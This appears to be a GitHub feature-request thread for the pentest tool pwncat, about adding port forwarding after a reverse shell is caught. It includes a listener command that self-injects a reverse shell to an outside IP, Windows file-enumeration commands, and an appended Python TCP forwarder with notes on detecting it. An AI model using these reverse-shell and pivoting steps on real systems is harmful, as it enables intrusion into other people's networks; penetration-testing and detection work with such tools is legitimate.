pwncat
Please implement ability to port forward after catching reverse shell
ISSUE TYPE
- Feature request
SUMMARY
Currently, you cannot combine a listener (-l) with a port forward (-L or -R). I would like a way to create a port forward through this tunnel after my listener has caught a reverse shell. I recommend implementing a command in the shell similar to the upload or download commands that will allow you to specify ports to forward. reverse and local shouldn't conflict with any host shell commands, or perhaps reverse-pf and local-pf.
Goal
Often I find that after connecting to a machine I need to add port forwarding in order to connect to some service that is running on that machine. I do not currently know an easy way to upgrade a shell with port forwarding other than compiling an exploit and using meterpreter, using plink or chisel, or, if I have credentials, using SSH. Most of these require running an additional binary on the host that may or may not be blocked from running.
After playing with using the --self-inject parameter, I believe this would be the easiest way to do this as-is, if the victim was a Unix machine.
pwncat -l 1234 -v --self-inject cmd.exe:10.10.14.187:1235
[PWNCAT CnC] Checking if remote sends greeting...
Spawn Shell...
Microsoft Windows [Version 10.0.17763.1817]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
[PWNCAT CnC] Checking if remote sends prefix/suffix to every request...
[PWNCAT CnC] Remote does not send prefix
[PWNCAT CnC] Remote does not send suffix
[PWNCAT CnC] Probing for: which python3
Traceback (most recent call last):
  File "/usr/bin/pwncat", line 6352, in <module>
    main()
  File "/usr/bin/pwncat", line 6263, in main
    CNCAutoDeploy(net, cnc_cmd, cnc_host, cnc_ports)
  File "/usr/bin/pwncat", line 4968, in __init__
    super(CNCAutoDeploy, self).__init__(network)
  File "/usr/bin/pwncat", line 4351, in __init__
    if not self.__set_remote_python_path():
  File "/usr/bin/pwncat", line 4821, in __set_remote_python_path
    response = self.remote_command("which {} 2>/dev/null".format(name), True)
  File "/usr/bin/pwncat", line 4632, in remote_command
    return self.send_recv(StringEncoder.encode(command), True, True)
  File "/usr/bin/pwncat", line 4606, in send_recv
    if data in responses[idx]:
IndexError: list index out of range
However, since I am testing with a Windows host as the remote machine, this fails: it requires both a Unix machine with the which command and python3 installed in the host's $PATH.
This is still something that lacks implementation. I will have to dig a bit into cmd.exe and powershell.exe capabilities for enumeration and self injection.
cmd.exe - finds files in %PATH% (stderr goes to the nul device, not to a file named "null")
where $filename 2>nul
For files not in %PATH%
where /R C:\ ping.exe 2>nul
Find file by name with PowerShell (comparison is -eq; a single = would assign to $_.Name)
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | ? {$_.Name -eq $filename}
Enumeration shouldn't be too hard, but I don't know about the self-injection part.
I will probably first have the forwarding feature as a generated payload here: https://github.com/cytopia/kusanagi. Once this is stable I will be looking into backporting it to pwncat automation.
Potential solution: upload this Python TCP-forward script and execute it; there is also a Perl version on the same site: https://mfnttps.github.io/mfnttps/python-portfwd/
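The "upload a Python TCP-forward script" idea from the last comment, as an added example that is neither the script from that site nor pwncat's own code: a minimal threaded TCP forwarder in the -L direction (each connection to a local listener is relayed to a target host:port), with a loopback echo server standing in for "some service running on that machine" so the whole thing runs self-contained. The loopback addresses, the `TcpForward` class and the `forward_roundtrip` helper are assumptions made for this demo, not names from pwncat or kusanagi.

```python
import socket
import threading

# Added example (not pwncat code): a minimal threaded TCP forwarder in the
# spirit of the "python tcp-forward script" mentioned in the thread. All
# addresses are loopback placeholders chosen for a self-contained demo.

def _shutdown(sock, how):
    """shutdown() that tolerates a peer that is already gone."""
    try:
        sock.shutdown(how)
    except OSError:
        pass

def _pump(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the EOF propagates."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
        _shutdown(dst, socket.SHUT_WR)
    except OSError:
        # reset or closed fd: tear down both sides so the opposite pump
        # thread is not left blocked in recv()
        _shutdown(src, socket.SHUT_RDWR)
        _shutdown(dst, socket.SHUT_RDWR)

def _relay(client, upstream):
    """Run both directions of one forwarded connection, then close both."""
    a = threading.Thread(target=_pump, args=(client, upstream), daemon=True)
    b = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    a.start()
    b.start()
    a.join()
    b.join()
    client.close()
    upstream.close()

class TcpForward:
    """-L style forward: every connection to listen_addr is relayed to target_addr."""

    def __init__(self, listen_addr, target_addr):
        self.listen_addr, self.target_addr = listen_addr, target_addr
        self._stop = threading.Event()
        self._srv = None

    def start(self):
        """Bind, run the accept loop in the background, return the bound port."""
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(self.listen_addr)
        srv.listen(16)
        srv.settimeout(0.2)  # short timeout so the loop can notice stop()
        self._srv = srv
        threading.Thread(target=self._accept_loop, daemon=True).start()
        return srv.getsockname()[1]

    def _accept_loop(self):
        while not self._stop.is_set():
            try:
                client, _ = self._srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            client.settimeout(None)
            try:
                upstream = socket.create_connection(self.target_addr, timeout=5)
            except OSError:
                client.close()  # target unreachable: drop only this client
                continue
            upstream.settimeout(None)
            threading.Thread(target=_relay, args=(client, upstream), daemon=True).start()
        self._srv.close()

    def stop(self):
        self._stop.set()

def start_echo_server():
    """Constructed stand-in for the service on the host: echoes one connection."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        with srv, srv.accept()[0] as conn:
            for data in iter(lambda: conn.recv(4096), b""):
                conn.sendall(data)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def forward_roundtrip(payload):
    """Push payload through forwarder -> echo server and return what came back."""
    echo_port = start_echo_server()
    fwd = TcpForward(("127.0.0.1", 0), ("127.0.0.1", echo_port))
    fwd_port = fwd.start()
    with socket.create_connection(("127.0.0.1", fwd_port), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)  # our EOF travels client -> relay -> echo
        got = b"".join(iter(lambda: c.recv(4096), b""))
    fwd.stop()
    return got
```

For the -R direction the roles invert: the host-side script connects out to the listener and relays back to a local service. From the defensive side the artifact of either variant is the same, a new listening socket or outbound connection owned by an interpreter process (python.exe, perl.exe) that has no reason to serve or proxy traffic, which is what netstat/ss output and process-to-socket correlation in an EDR surface.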